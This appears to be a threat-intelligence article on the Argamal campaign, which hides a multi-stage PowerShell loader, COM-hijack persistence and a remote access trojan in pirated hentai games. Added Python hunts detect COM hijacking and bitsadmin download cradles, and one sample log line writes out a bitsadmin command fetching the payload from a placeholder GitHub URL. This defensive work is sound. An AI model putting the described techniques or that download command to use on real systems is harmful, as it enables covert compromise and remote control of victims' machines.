Argamal Malware Hidden in Hentai Games Targets Users with Full System Compromise
A new malware campaign dubbed 'Argamal' is distributing a sophisticated implant hidden within 'hentai' games, leading to full system compromise and remote control capabilities for attackers.

Security researchers have uncovered a novel malware campaign, named 'Argamal,' that leverages the distribution of adult-themed 'hentai' games to infect unsuspecting users. First detected in April 2026, this campaign embeds a malicious implant within these games, which, after a delay of several days, downloads and executes a potent Trojan. This Trojan ultimately grants attackers comprehensive control over the victim's system.
The initial infection vector involves trojanized game files distributed through dedicated websites and torrent trackers, including AniRena. These archives contain legitimate game files alongside a modified FFmpeg DLL. This DLL imports a function from a file named natives2_blob.bin; once the game loads the DLL, that function executes a Base64-encoded PowerShell script. This script, referred to as Stage1, performs checks to ensure it is not running in a sandbox environment before establishing persistence.
Stage1 employs a COM hijacking technique to maintain its foothold on the victim's machine. It modifies registry keys, specifically the InprocServer32 entry for the Windows Color System Calibration Loader DLL, and sets up a scheduled task. This task is designed to execute three days after the initial infection, ensuring a delay before the next stage of the attack is initiated.
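The persistence described above leaves a concrete registry artifact: a per-user InprocServer32 value that redirects a CLSID to a DLL the attacker controls. The following hunt is an added example for defenders, not code from the article or from Kaspersky, and it does not use the real CLSID of the hijacked loader, which the article does not give. It takes InprocServer32 entries already collected from a host (hive, CLSID, DLL path) and flags two signals of COM hijacking: an HKCU registration that shadows the machine-wide HKLM one with a different DLL, and a DLL path outside trusted system directories. All CLSIDs and paths in the sample are constructed values.

```python
"""Hunt for COM hijacking via InprocServer32 redirection.

Added example; the CLSIDs and paths below are constructed, not indicators
from the campaign. Input is a list of (hive, clsid, dll_path) tuples taken
from the default value of each ...\CLSID\{...}\InprocServer32 key.
"""

# Directories a legitimately installed COM server is expected to live in.
TRUSTED_PREFIXES = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")

# Environment variables commonly seen in registered DLL paths.
ENV = {
    "%systemroot%": "c:\\windows",
    "%windir%": "c:\\windows",
    "%programfiles%": "c:\\program files",
}


def normalize(path: str) -> str:
    """Lower-case, strip quotes and expand the variables above for comparison."""
    p = path.strip().strip('"').lower()
    for var, val in ENV.items():
        p = p.replace(var, val)
    return p


def is_trusted_location(path: str) -> bool:
    """True when the DLL path resolves under a trusted directory.

    The prefixes end in a backslash so that e.g. 'C:\\Windows Update\\x.dll'
    does not pass as 'C:\\Windows\\'. A bare filename (no directory) is not
    trusted either, because it is resolved through the DLL search path.
    """
    return normalize(path).startswith(TRUSTED_PREFIXES)


def hunt_com_hijacks(entries):
    """Return findings for CLSIDs whose per-user InprocServer32 looks hijacked."""
    by_clsid = {}
    for hive, clsid, dll in entries:
        by_clsid.setdefault(clsid.upper(), {})[hive.upper()] = dll

    findings = []
    for clsid, hives in by_clsid.items():
        hkcu = hives.get("HKCU")
        if hkcu is None:
            continue  # machine-wide only; not the per-user pattern we hunt for
        reasons = []
        # HKCU wins over HKLM during COM activation in a user session, so a
        # per-user copy that points elsewhere redirects the legitimate object.
        if "HKLM" in hives and normalize(hkcu) != normalize(hives["HKLM"]):
            reasons.append("HKCU shadows HKLM registration")
        if not is_trusted_location(hkcu):
            reasons.append("DLL outside trusted directories")
        if reasons:
            findings.append({"clsid": clsid, "dll": hkcu, "reasons": reasons})
    return findings


# Constructed sample: one hijacked CLSID, one benign per-user duplicate,
# and one per-user-only registration dropped into a temp directory.
SAMPLE_ENTRIES = [
    ("HKLM", "{11111111-0000-0000-0000-000000000001}", r"%SystemRoot%\System32\example.dll"),
    ("HKCU", "{11111111-0000-0000-0000-000000000001}", r"C:\Users\alice\AppData\Roaming\update\loader.dll"),
    ("HKLM", "{22222222-0000-0000-0000-000000000002}", r"C:\Program Files\Vendor\app.dll"),
    ("HKCU", "{22222222-0000-0000-0000-000000000002}", r"C:\Program Files\Vendor\app.dll"),
    ("HKCU", "{33333333-0000-0000-0000-000000000003}", r"C:\Users\alice\AppData\Local\Temp\x.dll"),
]

if __name__ == "__main__":
    for f in hunt_com_hijacks(SAMPLE_ENTRIES):
        print(f["clsid"], f["dll"], "; ".join(f["reasons"]))
```

On a live host the entries would come from enumerating `HKCU\Software\Classes\CLSID` and `HKLM\Software\Classes\CLSID` (for example with a registry export), and the shadowing check is the stronger of the two signals: a per-user override of a CLSID that the system already registers is rarely legitimate.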
The scheduled task triggers Stage2, a PowerShell script responsible for downloading the main payload. Stage2 uses bitsadmin.exe to fetch an AES-CBC-encrypted file named zaesdl.dat from GitHub, decrypts it with a specific key and Initialization Vector (IV), and saves the result as a DLL file. That decrypted DLL is then configured to be executed by a legitimate Windows COM object, so it runs every time the user logs in.
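The download stage is visible in process-creation telemetry: bitsadmin.exe invoked with /transfer, a remote URL and a destination in a user-writable directory, spawned by a script interpreter. The detection below is an added example, not the article's or Kaspersky's code; the log format, host names and the GitHub URL (a placeholder account and repository) are constructed for the example, and the only campaign value used is the zaesdl.dat file name the article reports. The logic generalizes past this one case: it scores any bitsadmin transfer, adding weight for user-writable destinations and scripting parents, so an administrator's deployment job from a service is reported at lower confidence than a script-driven fetch into a temp directory.

```python
"""Score bitsadmin.exe process-creation events for download-cradle abuse.

Added example. Events are key=value lines with a quoted command line,
a constructed format standing in for whatever EDR or Sysmon export is at hand.
"""
import re

FIELD_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')   # unquoted values must not contain spaces
URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)
USER_DIR_RE = re.compile(r"^[a-z]:\\users\\", re.IGNORECASE)
SCRIPT_PARENTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe"}


def parse_event(line: str) -> dict:
    """Split one log line into a field dictionary, dropping surrounding quotes."""
    return {k: v.strip('"') for k, v in FIELD_RE.findall(line)}


def score_bits_event(ev: dict):
    """Return a finding for a bitsadmin /transfer from a remote URL, else None."""
    image = ev.get("image", "").lower()
    if not image.endswith("\\bitsadmin.exe"):
        return None
    cmd = ev.get("cmd", "")
    if "/transfer" not in cmd.lower():
        return None          # /list, /info etc. are not download cradles
    url = URL_RE.search(cmd)
    if url is None:
        return None

    reasons = ["bitsadmin /transfer with remote URL"]
    tokens = cmd.split()
    dest = tokens[-1]        # bitsadmin takes the local destination as the last argument
    dest_l = dest.lower()
    if USER_DIR_RE.match(dest_l) or "\\appdata\\" in dest_l or "\\temp\\" in dest_l:
        reasons.append("destination in user-writable path")
    parent = ev.get("parent", "").lower()
    if parent in SCRIPT_PARENTS:
        reasons.append(f"spawned by {parent}")

    return {
        "host": ev.get("host", "?"),
        "user": ev.get("user", "?"),
        "url": url.group(0),
        "dest": dest,
        "reasons": reasons,
    }


def hunt_bitsadmin(lines):
    """Run the scorer over raw log lines and keep only the hits."""
    return [f for f in (score_bits_event(parse_event(l)) for l in lines) if f]


# Constructed sample telemetry: a script-driven fetch into Temp, a benign
# job listing, and an administrative deployment run by a service.
LOGS = [
    r'ts=2026-04-14T10:02:11Z host=WS01 user=alice parent=powershell.exe image=C:\Windows\System32\bitsadmin.exe cmd="bitsadmin.exe /transfer upd /download /priority normal https://raw.githubusercontent.com/PLACEHOLDER-ACCOUNT/PLACEHOLDER-REPO/main/zaesdl.dat C:\Users\alice\AppData\Local\Temp\zaesdl.dat"',
    r'ts=2026-04-14T10:05:40Z host=WS01 user=alice parent=explorer.exe image=C:\Windows\System32\bitsadmin.exe cmd="bitsadmin.exe /list /allusers"',
    r'ts=2026-04-14T10:07:02Z host=SRV02 user=svc-deploy parent=services.exe image=C:\Windows\System32\bitsadmin.exe cmd="bitsadmin.exe /transfer pkg /download /priority normal http://deploy.corp.example/pkg.msi C:\ProgramData\Deploy\pkg.msi"',
]

if __name__ == "__main__":
    for f in hunt_bitsadmin(LOGS):
        print(f"{f['host']} {f['user']} -> {f['dest']}: {'; '.join(f['reasons'])}")
```

A finding with all three reasons is the shape of the Stage2 download; the single-reason deployment hit is worth keeping as a lower-severity event rather than suppressing, since the same job from an unexpected parent would be the interesting case.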
The final payload is a Remote Access Trojan (RAT) with extensive capabilities. Early versions utilized a rolling XOR key for decryption, while more recent variants employ string encryption with a custom substitution cipher. The RAT communicates with its command and control (C2) servers, with identified domains including asper1[.]freeddns[.]org and Winst0[.]kozow[.]com, both resolving to the same IP address. The malware also actively checks for the presence of numerous security solutions, attempting to evade detection.
Kaspersky solutions detect the various stages of this threat under multiple classifications, including Trojan.Win32.Termixia.*, Trojan.Win32.Agent.*, HEUR:Trojan.Win32.Argamal.gen, and HEUR:Trojan-Downloader.Win32.Argamal.gen. The campaign's longevity, with suspicious DLLs existing since at least 2024, suggests a persistent and evolving threat actor.
The use of legitimate game engines like RenPy and RPG Maker MV, combined with the deceptive distribution method, highlights a concerning trend of malware authors exploiting niche interests to reach potential victims. The multi-stage infection process, involving PowerShell scripts and COM hijacking for persistence, demonstrates a sophisticated approach to evading initial security measures and achieving deep system compromise.